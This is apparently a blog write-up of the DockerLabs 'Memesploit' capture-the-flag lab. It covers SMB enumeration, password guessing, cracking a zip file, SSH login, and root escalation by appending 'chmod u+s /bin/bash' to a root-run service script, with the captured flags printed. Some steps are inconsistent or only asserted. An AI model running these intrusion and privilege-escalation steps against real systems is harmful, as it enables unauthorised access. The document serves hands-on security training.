MEMESPLOIT MACHINE

 MEMESPLOIT



┌──(root㉿kali)-[/home/kali/Descargas]
└─# bash auto_deploy.sh memesploit.tar

                            ##        .         
                      ## ## ##       ==         
                   ## ## ## ##      ===         
               /""""""""""""""""\___/ ===       
          ~~~ {~~ ~~~~ ~~~ ~~~~ ~~ ~ /  ===- ~~~
               \______ o          __/           
                 \    \        __/            
                  \____\______/               
                                          
  ___  ____ ____ _  _ ____ ____ _    ____ ___  ____ 
  |  \ |  | |    |_/  |___ |__/ |    |__| |__] [__  
  |__/ |__| |___ | \_ |___ |  \ |___ |  | |__] ___] 
                                         
                                    
Estamos desplegando la máquina vulnerable, espere un momento.

Máquina desplegada, su dirección IP es --> 172.17.0.2

Presiona Ctrl+C cuando termines con la máquina para eliminarla    

Once the host was identified, Nmap, a port scanning tool, was used to discover which services were running on the machine. The scan revealed port 80 (HTTP), 445 (SMB), 139 (SMB), 22 (SSH) was open.
┌──(root㉿kali)-[/home/kali/dockerlabs]
└─# nmap -n -Pn -p- --min-rate 5000 -sV -vvv 172.17.0.2
Starting Nmap 7.95 ( https://nmap.org ) at 2025-10-25 14:58 CEST
NSE: Loaded 47 scripts for scanning.
Initiating ARP Ping Scan at 14:58
Scanning 172.17.0.2 [1 port]
Completed ARP Ping Scan at 14:58, 0.06s elapsed (1 total hosts)
Initiating SYN Stealth Scan at 14:58
Scanning 172.17.0.2 [65535 ports]
Discovered open port 445/tcp on 172.17.0.2
Discovered open port 139/tcp on 172.17.0.2
Discovered open port 22/tcp on 172.17.0.2
Discovered open port 80/tcp on 172.17.0.2
Completed SYN Stealth Scan at 14:58, 0.76s elapsed (65535 total ports)
Initiating Service scan at 14:58
Scanning 4 services on 172.17.0.2
Completed Service scan at 14:58, 11.02s elapsed (4 services on 1 host)
NSE: Script scanning 172.17.0.2.
NSE: Starting runlevel 1 (of 2) scan.
Initiating NSE at 14:58
Completed NSE at 14:58, 0.04s elapsed
NSE: Starting runlevel 2 (of 2) scan.
Initiating NSE at 14:58
Completed NSE at 14:58, 0.01s elapsed
Nmap scan report for 172.17.0.2
Host is up, received arp-response (0.0000040s latency).
Scanned at 2025-10-25 14:58:31 CEST for 11s
Not shown: 65531 closed tcp ports (reset)
PORT    STATE SERVICE     REASON         VERSION
22/tcp  open  ssh         syn-ack ttl 64 OpenSSH 9.6p1 Ubuntu 3ubuntu13.5 (Ubuntu Linux; protocol 2.0)
80/tcp  open  http        syn-ack ttl 64 Apache httpd 2.4.58 ((Ubuntu))
139/tcp open  netbios-ssn syn-ack ttl 64 Samba smbd 4
445/tcp open  netbios-ssn syn-ack ttl 64 Samba smbd 4
MAC Address: 02:42:AC:11:00:02 (Unknown)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Read data files from: /usr/share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.18 seconds
           Raw packets sent: 65536 (2.884MB) | Rcvd: 65536 (2.621MB)

In addition, we have to execute this toolkit and we will get many information about domain such as (users, folders etc) as you can see below.
┌──(root㉿kali)-[/home/kali/dockerlabs]
└─# smbmap -H 172.17.0.2 -u '' -p ''           
    ________  ___      ___  _______   ___      ___       __         _______
   /"       )|"  \    /"  ||   _  "\ |"  \    /"  |     /""\       |   __ "\
  (:   \___/  \   \  //   |(. |_)  :) \   \  //   |    /    \      (. |__) :)
   \___  \    /\  \/.    ||:     \/   /\   \/.    |   /' /\  \     |:  ____/
    __/  \   |: \.        |(|  _  \  |: \.        |  //  __'  \    (|  /
   /" \   :) |.  \    /:  ||: |_)  :)|.  \    /:  | /   /  \   \  /|__/ \
  (_______/  |___|\__/|___|(_______/ |___|\__/|___|(___/    \___)(_______)
-----------------------------------------------------------------------------
SMBMap - Samba Share Enumerator v1.10.7 | Shawn Evans - ShawnDEvans@gmail.com
                     https://github.com/ShawnDEvans/smbmap

[*] Detected 1 hosts serving SMB                                                                                                  
[*] Established 1 SMB connections(s) and 0 authenticated session(s)                                                          
                                                                                                                             
[+] IP: 172.17.0.2:445  Name: 172.17.0.2                Status: NULL Session
        Disk                                                    Permissions     Comment
        ----                                                    -----------     -------
        print$                                                  NO ACCESS       Printer Drivers
        share_memehydra                                         NO ACCESS
        IPC$                                                    NO ACCESS       IPC Service (39fba155ef6a server (Samba, Ubuntu))
[*] Closed 1 connections

┌──(root㉿kali)-[/home/kali/dockerlabs]
└─# smbclient //172.17.0.2/print$ 
Password for [WORKGROUP\root]:
tree connect failed: NT_STATUS_ACCESS_DENIED

┌──(root㉿kali)-[/home/kali/dockerlabs]
└─# enum4linux -a 172.17.0.2
Starting enum4linux v0.9.1 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Sat Oct 25 15:04:13 2025

 =========================================( Target Information )=========================================

Target ........... 172.17.0.2
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none


 =============================( Enumerating Workgroup/Domain on 172.17.0.2 )=============================


[E] Can't find workgroup/domain



 =================================( Nbtstat Information for 172.17.0.2 )=================================

Looking up status of 172.17.0.2
No reply from 172.17.0.2

 ====================================( Session Check on 172.17.0.2 )====================================

                                                                                                                              
[+] Server 172.17.0.2 allows sessions using username '', password ''                                                          
                                                                                                                              
                                                                                                                              
 =================================( Getting domain SID for 172.17.0.2 )=================================                               
                                                                                                                                       
Domain Name: WORKGROUP                                                                                                                 
Domain Sid: (NULL SID)

[+] Can't determine if host is part of domain or part of a workgroup                                                                   
                                                                                                                                       
                                                                                                                                       
 ====================================( OS information on 172.17.0.2 )====================================
                                                                                                                                       
                                                                                                                                       
[E] Can't get OS info with smbclient                                                                                                   
                                                                                                                                       
                                                                                                                                       
[+] Got OS info for 172.17.0.2 from srvinfo:                                                                                           
        39FBA155EF6A   Wk Sv PrQ Unx NT SNT 39fba155ef6a server (Samba, Ubuntu)                                                        
        platform_id     :       500
        os version      :       6.1
        server type     :       0x809a03


 ========================================( Users on 172.17.0.2 )========================================
                                                                                                                                       
index: 0x1 RID: 0x3e8 acb: 0x00000010 Account: memehydra        Name: memehydra Desc:                                                  

user:[memehydra] rid:[0x3e8]

 ==================================( Share Enumeration on 172.17.0.2 )==================================
                                                                                                                                       
smbXcli_negprot_smb1_done: No compatible protocol selected by server.                                                                  

        Sharename       Type      Comment
        ---------       ----      -------
        print$          Disk      Printer Drivers
        share_memehydra Disk      
        IPC$            IPC       IPC Service (39fba155ef6a server (Samba, Ubuntu))
Reconnecting with SMB1 for workgroup listing.
Protocol negotiation to server 172.17.0.2 (for a protocol between LANMAN1 and NT1) failed: NT_STATUS_INVALID_NETWORK_RESPONSE
Unable to connect with SMB1 -- no workgroup available

[+] Attempting to map shares on 172.17.0.2                                                                                             
                                                                                                                                       
//172.17.0.2/print$     Mapping: DENIED Listing: N/A Writing: N/A                                                                      
//172.17.0.2/share_memehydra    Mapping: DENIED Listing: N/A Writing: N/A

[E] Can't understand response:                                                                                        
                                                                                                                                   
NT_STATUS_CONNECTION_REFUSED listing \*                                                                                                
//172.17.0.2/IPC$       Mapping: N/A Listing: N/A Writing: N/A

 =============================( Password Policy Information for 172.17.0.2 )=============================
                                                                                                                                       
Password:                                                                                                                              


[+] Attaching to 172.17.0.2 using a NULL share

[+] Trying protocol 139/SMB...

[+] Found domain(s):

        [+] 39FBA155EF6A
        [+] Builtin

[+] Password Info for Domain: 39FBA155EF6A

        [+] Minimum password length: 5
        [+] Password history length: None
        [+] Maximum password age: 136 years 37 days 6 hours 21 minutes 
        [+] Password Complexity Flags: 000000

                [+] Domain Refuse Password Change: 0
                [+] Domain Password Store Cleartext: 0
                [+] Domain Password Lockout Admins: 0
                [+] Domain Password No Clear Change: 0
                [+] Domain Password No Anon Change: 0
                [+] Domain Password Complex: 0

        [+] Minimum password age: None
        [+] Reset Account Lockout Counter: 30 minutes 
        [+] Locked Account Duration: 30 minutes 
        [+] Account Lockout Threshold: None
        [+] Forced Log off Time: 136 years 37 days 6 hours 21 minutes 



[+] Retieved partial password policy with rpcclient:                                                                                   
                                                                                                                                       
                                                                                                                                       
Password Complexity: Disabled                                                                                                          
Minimum Password Length: 5


 ========================================( Groups on 172.17.0.2 )========================================
                                                                                                                                       
                                                                                                                                       
[+] Getting builtin groups:                                                                                                            
                                                                                                                                       
                                                                                                                                       
[+]  Getting builtin group memberships:                                                                                                
                                                                                                                                       
                                                                                                                                       
[+]  Getting local groups:                                                                                                             
                                                                                                                                       
                                                                                                                                       
[+]  Getting local group memberships:                                                                                                  
                                                                                                                                       
                                                                                                                                       
[+]  Getting domain groups:                                                                                                            
                                                                                                                                       
                                                                                                                                       
[+]  Getting domain group memberships:                                                                                                 
                                                                                                                                       
                                                                                                                                       
 ===================( Users on 172.17.0.2 via RID cycling (RIDS: 500-550,1000-1050) )===================
                                                                                                                                       
                                                                                                                                       
[I] Found new SID:                                                                                                                     
S-1-22-1                                                                                                                               

[I] Found new SID:                                                                                                                     
S-1-5-32                                                                                                                               

[I] Found new SID:                                                                                                                     
S-1-5-32                                                                                                                               

[I] Found new SID:                                                                                                                     
S-1-5-32                                                                                                                               

[I] Found new SID:                                                                                                                     
S-1-5-32                                                                                                                               

[+] Enumerating users using SID S-1-5-21-2211627352-2962163924-2548321881 and logon username '', password ''                           
                                                                                                                                       
S-1-5-21-2211627352-2962163924-2548321881-501 39FBA155EF6A\nobody (Local User)                                                         
S-1-5-21-2211627352-2962163924-2548321881-513 39FBA155EF6A\None (Domain Group)
S-1-5-21-2211627352-2962163924-2548321881-1000 39FBA155EF6A\memehydra (Local User)

[+] Enumerating users using SID S-1-22-1 and logon username '', password ''                                                            
                                                                                                                                       
S-1-22-1-1001 Unix User\memesploit (Local User)                                                                                        
S-1-22-1-1002 Unix User\memehydra (Local User)

[+] Enumerating users using SID S-1-5-32 and logon username '', password ''                                                                                                                                                                                         
S-1-5-32-544 BUILTIN\Administrators (Local Group)                                                                                      
S-1-5-32-545 BUILTIN\Users (Local Group)
S-1-5-32-546 BUILTIN\Guests (Local Group)
S-1-5-32-547 BUILTIN\Power Users (Local Group)
S-1-5-32-548 BUILTIN\Account Operators (Local Group)
S-1-5-32-549 BUILTIN\Server Operators (Local Group)
S-1-5-32-550 BUILTIN\Print Operators (Local Group)

 ================================( Getting printer info for 172.17.0.2 )================================
                                                                                                                                       
No printers returned.                                                                                                                


enum4linux complete on Sat Oct 25 15:05:27 2025

In addition, as we have discovered password we can try listing nothing  as you can see below.
┌──(root㉿kali)-[/home/kali/dockerlabs]
└─# smbclient //172.17.0.2/share_memehydra -U ""
Password for [WORKGROUP\]:
tree connect failed: NT_STATUS_ACCESS_DENIED
                                                                          In addition, as we have discovered password we can try listing nothing  as you can see below.                          
┌──(root㉿kali)-[/home/kali/dockerlabs]
└─# smbclient //172.17.0.2/share_memehydra -U "memehydra"
Password for [WORKGROUP\memehydra]:
session setup failed: NT_STATUS_LOGON_FAILURE                      

In addition, as we have discovered password we can try listing nothing as you can see below.                          
┌──(root㉿kali)-[/home/kali/dockerlabs]
└─# smbclient //172.17.0.2/share_memehydra -U "memesploit"
Password for [WORKGROUP\memesploit]:
tree connect failed: NT_STATUS_ACCESS_DENIED                      
In addition, as we have discovered password we can try listing nothing  as you can see below.                         
┌──(root㉿kali)-[/home/kali/dockerlabs]
└─# smbclient //172.17.0.2/share_memehydra -U memehydra   
Password for [WORKGROUP\memehydra]:
session setup failed: NT_STATUS_LOGON_FAILURE
                                                                          
In addition, as we have discovered password we can try listing nothing as you can see below.                  
┌──(root㉿kali)-[/home/kali/dockerlabs]
└─# smbclient //172.17.0.2/share_memehydra -U memehydra
Password for [WORKGROUP\memehydra]:
session setup failed: NT_STATUS_LOGON_FAILURE

Now, we are going to create password dictionary as you can see below.
┌──(root㉿kali)-[/home/kali/dockerlabs]
└─# cat password.txt                                   
fuerzabrutasiempre
memesploit_ctf
memehydra 
       
 In addition, as we have discovered password we can try listing with share_memehydra as you can see below which password's memesploit_ctf
┌──(root㉿kali)-[/home/kali/dockerlabs]
└─# smbclient //172.17.0.2/share_memehydra -U memehydra
Password for [WORKGROUP\memehydra]:
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Sat Aug 31 17:15:13 2024
  ..                                  D        0  Sat Aug 31 17:15:13 2024
  secret.zip                          N      224  Sat Aug 31 17:15:06 2024

                24253528 blocks of size 1024. 0 blocks available
smb: \> 



In addition, as we have discovered password we can try listing prints with print$ as you can see below.
┌──(root㉿kali)-[/home/kali/dockerlabs]
└─# smbclient //172.17.0.2/print$ -U memehydra         
Password for [WORKGROUP\memehydra]:
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Sat Oct 25 15:05:27 2025
  ..                                  D        0  Sat Oct 25 15:05:27 2025
  W32ALPHA                            D        0  Mon Apr  8 16:49:25 2024
  W32PPC                              D        0  Mon Apr  8 16:49:25 2024
  x64                                 D        0  Sat Oct 25 15:05:27 2025
  W32X86                              D        0  Sat Oct 25 15:05:27 2025
  COLOR                               D        0  Mon Apr  8 16:49:25 2024
  WIN40                               D        0  Mon Apr  8 16:49:25 2024
  W32MIPS                             D        0  Mon Apr  8 16:49:25 2024
  IA64                                D        0  Mon Apr  8 16:49:25 2024
  color                               D        0  Sat Oct 25 15:05:27 2025
  ARM64                               D        0  Sat Oct 25 15:05:27 2025

In addition, as we have discovered password we can try listing with  IPC$  and obtain secret.zip as you can see below.
┌──(root㉿kali)-[/home/kali/dockerlabs]
└─# smbclient //172.17.0.2/IPC$ -U memehydra  
Password for [WORKGROUP\memehydra]:
Try "help" to get a list of possible commands.
smb: \> ls
NT_STATUS_CONNECTION_REFUSED listing \*
smb: \> 
smb: \> get secret.zip 
getting file \secret.zip of size 224 as secret.zip (109,4 KiloBytes/sec) (average 109,4 KiloBytes/sec)

Now, let's go to execute unzip to get the content but we cannot do nothing because it will need a password as you can see below.
┌──(root㉿kali)-[/home/kali/dockerlabs]
└─# unzip secret.zip  
Archive:  secret.zip
[secret.zip] secret.txt password: 
   skipping: secret.txt              incorrect password

Now, let's go to to execute the john the Ripper to get the password, but we have not luck as you can see below.
┌──(root㉿kali)-[/home/kali/dockerlabs]
└─# john --wordlist=/usr/share/wordlists/rockyou.txt password.txt 
Using default input encoding: UTF-8
Loaded 1 password hash (PKZIP [32/64])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
0g 0:00:00:08 DONE (2025-10-25 15:16) 0g/s 1663Kp/s 1663Kc/s 1663KC/s "2parrow"..*7¡Vamos!
Session completed.

In addition,  we are going to unzip and then we have the goal as you can see below.
┌──(root㉿kali)-[/home/kali/dockerlabs]
└─# unzip secret.zip
Archive:  secret.zip
[secret.zip] secret.txt password: 
password incorrect--reenter: 
  inflating: secret.txt                                                                                                             

┌──(root㉿kali)-[/home/kali/dockerlabs]
└─# cat secret.txt 
memesploit:metasploitelmejor

Now, we must connect via ssh with the credential which has been got in the last step.
┌──(root㉿kali)-[/home/kali/dockerlabs]
└─# ssh memesploit@172.17.0.2
The authenticity of host '172.17.0.2 (172.17.0.2)' can't be established.
ED25519 key fingerprint is SHA256:CDT5FEJ/D3ouGQ/mBSBX03IkZwybpkLlqaVw9nVkjhs.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '172.17.0.2' (ED25519) to the list of known hosts.
memesploit@172.17.0.2's password: 
Welcome to Ubuntu 24.04 LTS (GNU/Linux 6.16.8+kali-amd64 x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/pro

This system has been minimized by removing packages and content that are
not required on a system that users do not log into.

To restore this content, you can run the 'unminimize' command.
Last login: Sat Aug 31 16:41:01 2024 from 172.17.0.1
memesploit@39fba155ef6a:~$ 
memesploit@39fba155ef6a:~$ sudo -l
Matching Defaults entries for memesploit on 39fba155ef6a:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty
User memesploit may run the following commands on 39fba155ef6a:
    (ALL : ALL) NOPASSWD: /usr/sbin/service login_monitor restart

We as see the user should be able to convert in root and we have to the discover the path to be root as you can see below.
memesploit@39fba155ef6a:/$ find / -name 'login_monitor' 2>/dev/null
/etc/init.d/login_monitor
/etc/login_monitor
memesploit@fbcef16e2208:/etc/login_monitor$ find / -name user.txt 2>/dev/null
/home/memesploit/user.txt

Gotha! we have just discovered the user flag as you can see below.
memesploit@fbcef16e2208:/etc/login_monitor$ cat /home/memesploit/user.txt      
58a071849802bb0d1a782f928d5a4121
memesploit@39fba155ef6a:/$ cd /etc/login_monitor
memesploit@39fba155ef6a:/etc/login_monitor$ ls
actionban.sh  activity.sh  loggin.conf  network.conf  network.sh  security.conf  security.sh
memesploit@39fba155ef6a:/etc/login_monitor$ ls -la
total 36
drwxrwx--- 2 root security 4096 Aug 31  2024 .
drwxr-xr-x 1 root root     4096 Oct 25 14:57 ..
-rwxr-xr-x 1 root root      620 Aug 31  2024 actionban.sh
-rwxr-xr-x 1 root root      472 Aug 31  2024 activity.sh
-rw-r--r-- 1 root root      200 Aug 31  2024 loggin.conf
-rw-r--r-- 1 root root      224 Aug 31  2024 network.conf
-rwxr-xr-x 1 root root      501 Aug 31  2024 network.sh
-rw-r--r-- 1 root root      209 Aug 31  2024 security.conf
-rwxr-xr-x 1 root root      488 Aug 31  2024 security.sh
 
memesploit@fbcef16e2208:/etc/login_monitor$ cat activity.sh 
#!/bin/bash

# Cargar la configuración de logs
CONFIG_FILE="/etc/actionban/logging.conf"
if [ ! -f "$CONFIG_FILE" ]; then
    echo "Archivo de configuración de logs no encontrado: $CONFIG_FILE"
    exit 1
fi

source "$CONFIG_FILE"

# Simular generación de logs de actividad y errores
echo "Simulación de actividad y errores"

# Registrar actividad
echo "$(date): Actividad simulada" >> "$ACTIVITY_LOG"

# Registrar error
echo "$(date): Error simulado" >> "$ERROR_LOG"
 
memesploit@fbcef16e2208:/etc/login_monitor$ cat security.sh 
#!/bin/bash

# Cargar la configuración de seguridad
CONFIG_FILE="/etc/actionban/security.conf"
if [ ! -f "$CONFIG_FILE" ]; then
    echo "Archivo de configuración de seguridad no encontrado: $CONFIG_FILE"
    exit 1
fi

source "$CONFIG_FILE"

# Simular un evento de seguridad
echo "Simulación de evento de seguridad con nivel $SECURITY_LEVEL"

# Registrar el evento de seguridad en el archivo
echo "$(date): Evento de seguridad registrado con nivel $SECURITY_LEVEL" >> "$SECURITY_LOG" 
 
memesploit@fbcef16e2208:/etc/login_monitor$ cat network.sh 
#!/bin/bash

# Cargar la configuración de red
CONFIG_FILE="/etc/actionban/network.conf"
if [ ! -f "$CONFIG_FILE" ]; then
    echo "Archivo de configuración de red no encontrado: $CONFIG_FILE"
    exit 1
fi

source "$CONFIG_FILE"

# Simular el estado de la red
echo "Simulación de estado de red en la interfaz $NETWORK_INTERFACE en el puerto $SERVICE_PORT"

# Registrar el estado de la red en el archivo
echo "$(date): Estado de red en $NETWORK_INTERFACE, puerto $SERVICE_PORT" >> "$NETWORK_STATUS" 
 
memesploit@39fba155ef6a:/etc/login_monitor$ id
uid=1001(memesploit) gid=1001(memesploit) groups=1001(memesploit),100(users),1003(security)

Matching Defaults entries for memesploit on fe790dc8f6b8:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty

User memesploit may run the following commands on fe790dc8f6b8:
    (ALL : ALL) NOPASSWD: /usr/sbin/service login_monitor restart
memesploit@fe790dc8f6b8:~$ sudo /usr/sbin/service login_monitor restart
Stopping login_monitor...
Starting login_monitor...
memesploit@fe790dc8f6b8:~$ find / -name 'login_monitor' 2>/dev/null
/etc/init.d/login_monitor
/etc/login_monitor
memesploit@fe790dc8f6b8:~$ cd /etc/login_monitor
memesploit@fe790dc8f6b8:/etc/login_monitor$ ls -la
total 36
drwxrwx--- 2 root security 4096 Aug 31  2024 .
drwxr-xr-x 1 root root     4096 Oct 25 15:58 ..
-rwxr-xr-x 1 root root      620 Aug 31  2024 actionban.sh
-rwxr-xr-x 1 root root      472 Aug 31  2024 activity.sh
-rw-r--r-- 1 root root      200 Aug 31  2024 loggin.conf
-rw-r--r-- 1 root root      224 Aug 31  2024 network.conf
-rwxr-xr-x 1 root root      501 Aug 31  2024 network.sh
-rw-r--r-- 1 root root      209 Aug 31  2024 security.conf
-rwxr-xr-x 1 root root      488 Aug 31  2024 security.sh
memesploit@fe790dc8f6b8:/etc/login_monitor$ id
uid=1001(memesploit) gid=1001(memesploit) groups=1001(memesploit),100(users),1003(security)
memesploit@fe790dc8f6b8:/etc/login_monitor$ nano actionban.sh 
memesploit@fe790dc8f6b8:/etc/login_monitor$ cp actionban.sh actionban.cp
memesploit@fe790dc8f6b8:/etc/login_monitor$ rm actionban.sh
rm: remove write-protected regular file 'actionban.sh'? y
memesploit@fe790dc8f6b8:/etc/login_monitor$ mv actionban.cp actionban.sh
memesploit@fe790dc8f6b8:/etc/login_monitor$ nano actionban.sh

Yes, if we modify the file, we will be able to be root user as you can see below with this command which is:
  • chmod u+s /bin/bash 
# Ruta del archivo que simula el registro de bloqueos
BLOCK_LOG="/tmp/block_log.txt"

# Función para generar una IP aleatoria
generate_random_ip() {
    echo "$((RANDOM % 255 + 1)).$((RANDOM % 255 + 1)).$((RANDOM % 255 + 1)).$((RANDOM % 255 + 1))"
}

# Generar una IP aleatoria
IP_TO_BLOCK=$(generate_random_ip)

# Mensaje de simulación
MESSAGE="Simulación de bloqueo de IP: $IP_TO_BLOCK"

# Mostrar el mensaje en la terminal
echo "$MESSAGE"

# Registrar el intento de bloqueo en el archivo
echo "$(date): $MESSAGE" >> "$BLOCK_LOG"

echo "El registro ha sido creado en $BLOCK_LOG con la IP $IP_TO_BLOCK"

chmod u+s /bin/bash

open in other terminal
┌──(root㉿kali)-[/home/kali]
└─# ssh memesploit@172.17.0.2                  
memesploit@172.17.0.2's password: 
Welcome to Ubuntu 24.04 LTS (GNU/Linux 6.16.8+kali-amd64 x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/pro

This system has been minimized by removing packages and content that are
not required on a system that users do not log into.

To restore this content, you can run the 'unminimize' command.
Last login: Sat Oct 25 18:16:20 2025 from 172.17.0.1
-bash-5.2$ bash -p
bash-5.2# whoami
root
bash-5.2# find / -name root.txt
/root/root.txt
bash-5.2# cat  /root/root.txt                
b57069733c1fbdf4795c0b36597c307a
 
Thank you very much for reading this article

I hope you liked and learned something new

This article has been done with ethical proposes

Good Hack

Comments

Post a Comment

Entradas Populares

INTERNAL

Image
 INTERNAL(TRYHACKME) First of all, let's go execute nmap command to identify alives ports and version with this host 192.168.88.6 as you can see below. Key open ports and services include: Web Servers: Port 80 (HTTP):  Running  Apache2 Ubuntu Default Page . It supports  OPTIONS ,  TRACE  (flagged as potentially risky),  GET ,  HEAD , and  POST  methods. The webpage title is " INTERNAL ". SSH Protocol Port 22 (SSH): Running Linux . ┌──(root㉿kali)-[/home/luis/Descargas] └─# nmap -n -Pn -p- --min-rate 5000 -sC 10.10.216.78 -vvv Starting Nmap 7.95 ( https://nmap.org ) at 2025-08-07 12:06 CEST NSE: Loaded 126 scripts for scanning. NSE: Script Pre-scanning. NSE: Starting runlevel 1 (of 2) scan. Initiating NSE at 12:06 Completed NSE at 12:06, 0.00s elapsed NSE: Starting runlevel 2 (of 2) scan. Initiating NSE at 12:06 Completed NSE at 12:06, 0.00s elapsed Initiating SYN Stealth Scan at 12:06 Scanning 10.10.216.78 [65535 ports] Discove...
Read more »

TOR WEB BROWSER

Image
  TOR WEB BROWSER TOR INSTALLATION First of all; we're going to this link from the oficial webpage: https://www.torproject.org/es/download/   where we have to download this version our laptop, Windows and Linux but in my case I've had to download for Windows 10. When the program is installed we will press execute and we'll follow step by step:   We'll open and we'll see this image where you have to select the language and select ok to continue the instal l ation. In addition, we'll select the location wherever you want install the program, but in my case I prefer the default location and you'll able to select wherever you want. Now, we will be started the installation process and when it finished you will be able to see the picture below: TOR CONNECT If the process has been successful, you will be able to connect with the connect button which you can observe in both pictures below: ADD A BRIDGE ...
Read more »

activedirectory

Image
ACTIVEDIRECTORY (TRYHACKME) First of all, let’s go to execute nmap toolkit and we'll be able to start the enumeration of the ports as you can see below with this command: sudo nmap -n -Pn -p- --min-rate 5000 10.10.135.154 -vvv -sC -sV This revealed several open TCP ports with associated services, including: DNS (53),  HTTP  (80),  Kerberos (88),  RPC (135),  NetBIOS-SSN (139),  SMB (445),  RDP (3389),  WS-Management (5985)  LDAP (389, 636, 3268, 3269) Moreover, service and NSE script detection provided valuable information about the services running on these ports, such as IIS 10.0, Microsoft Windows Kerberos , Active Directory LDAP , and Microsoft Terminal Services . The SSL/TLS certificate information on port 3389 indicated the common name AttacktiveDirectory.spookysec.local, reinforcing the target as an Active Directory server. rdp-ntlm-info also provided details about the domain (THM-AD) and computer name (ATTACKTIVEDIREC) as you can se...
Read more »

PICKLE RICK

Image
  PICKLE RICK I'm going to realize the resolution of the machine Level Easy from Tryhackme called  Pickle Rick  which is a machine so easy to realize. First of all,  we can observe that in the picture bellow we have some inforamtion and I'm going to execute control +u  and we can see in the second picture below that we've obtained a  Username. I'm going to gathering information about machine and I have to enter in the Linux terminal and I must introduce this command which you canobserve in the picture below:   gobuster dir -u(url) http://10.10.99.188/ -w(password dictionary)  /usr/share/wordlist/dirb/common.txt -x (formato que quereos que busque) .txt*, .php, .login,  In this case, we can observe that scan has discovered this 4 webpages: /assests /denied.php /index.html /login.php /robots.txt Now, we can see such as the web page from /robots.txt   it seems the password in the picture below. Now, we've discovered this login web page...
Read more »

Metasploit Framework

Image
 METASPLOIT FRAMEWORK USE TO  AUXILIARY MODULE FROM METASPLOIT First of all, I have used the auxiliary modules from Metasploit-Framework which could allow me Scanning, see ports, SO version, vulnerability in applications etc, where you can see at the bottom of the picture if  I use this module whose name is: auxiliary/scanner/discovery/arp_sweep  (To verify the IPs listening in the network) Now, we can observe that when I have selected in the auxiliary module I have had to do this set up  that we can observe in the second page below: INTERFACE : This I've set up the network interface that in my case is the eth0 interface. RHOSTS :This I've set up the IP Address which I am finding out that in my case is 192.168.100.0/24 (all the IP Address from network that could be possible which I am analyzing). THREADS : Are the threads; it's the fast  that I want to analyze the IP Addresses but in my case there are 15 threads because I want to analize as fast as possible...
Read more »

HOSTING

Image
HOSTING First of all, let's go to hosting machine from active directory, for it  using arp-scan to discover active hosts on the local network, identifying 192.168.88.8 as you can see in below. ┌──(kali㉿kali)-[~] └─$ sudo arp-scan -I eth0 --localnet Interface: eth0, type: EN10MB, MAC: 08:00:27:43:73:bc, IPv4: 192.168.88.5 Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan) 192.168.88.1 d8:44:89:50:2d:a3 (Unknown) 192.168.88.8 08:00:27:98:d4:bf PCS Systemtechnik GmbH 192.168.88.9 00:e0:4c:69:66:4a REALTEK SEMICONDUCTOR CORP. 3 packets received by filter, 0 packets dropped by kernel Ending arp-scan 1.10.0: 256 hosts scanned in 2.075 seconds (123.37 hosts/sec). 3 responded ┌──(kali㉿kali)-[~] └─$ ping -c1 192.168.88.8 PING 192.168.88.8 (192.168.88.8) 56(84) bytes of data. 64 bytes from 192.168.88.8: icmp_seq=1 ttl=128...
Read more »

LOVE

Image
BUSCALOVE First of all, I am going to do this machine from cybersecurity labs called BuscaLove which is easy Level. For it, let’s go to open Linux terminal and we have to write the command when we can see in the picture below. cd Descargas In addition, we have to depress the unzip file whose name’s buscalove.zip you can see in the picture below. Now we have to deploy the vulnerability machine whose command is sudo bash auto_deploy.sh buscalove.tar we can see in the picture below. On the other hand, to start the attack at virtual machine, we must verify if the attacker machine is in the same range of IP Address and we have to introduce this command which is ping -c 3 172.18.0.2 we can see in the picture below. As I,ve just seen the IP Address it’s in the same range of my IP Address we have to introduce the command with nmap tool which is nmap -n -Pn 172.18.0.2 -p- - -min-rate 4000 -vvv( here you can see in this picture the scanner) but I’ve got it 2 ports: 22: open ssh 80: open http No...
Read more »

CHANGE MACHINE

Image
CHANGE  First of all, let's go to hosting machine from active directory, for it  using  arp-scan  to discover active hosts on the local network, identifying  192.168.88.8   as you can see in below . ┌──(root㉿kali)-[/home/luis] └─# arp-scan -I eth0 --localnet Interface: eth0, type: EN10MB, MAC: 08:00:27:4d:8a:0f, IPv4: 192.168.88.6 WARNING: Cannot open MAC/Vendor file ieee-oui.txt: Permission denied WARNING: Cannot open MAC/Vendor file mac-vendor.txt: Permission denied Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan) 192.168.88.1 d8:44:89:50:2d:a3 (Unknown) 192.168.88.4 00:e0:4c:97:01:a7 (Unknown) 192.168.88.5 00:d8:61:fa:c0:4a (Unknown) 192.168.88.7 08:00:27:b1:ae:9f (Unknown) 4 packets received by filter, 0 packets dropped by kernel Ending arp-scan 1.10.0: 256 hosts scanned in 1.848 seconds (138.53 hosts/sec). 4 responded Now, let's go execute nmap command to identify alives ports and version with this host  192.168.88...
Read more »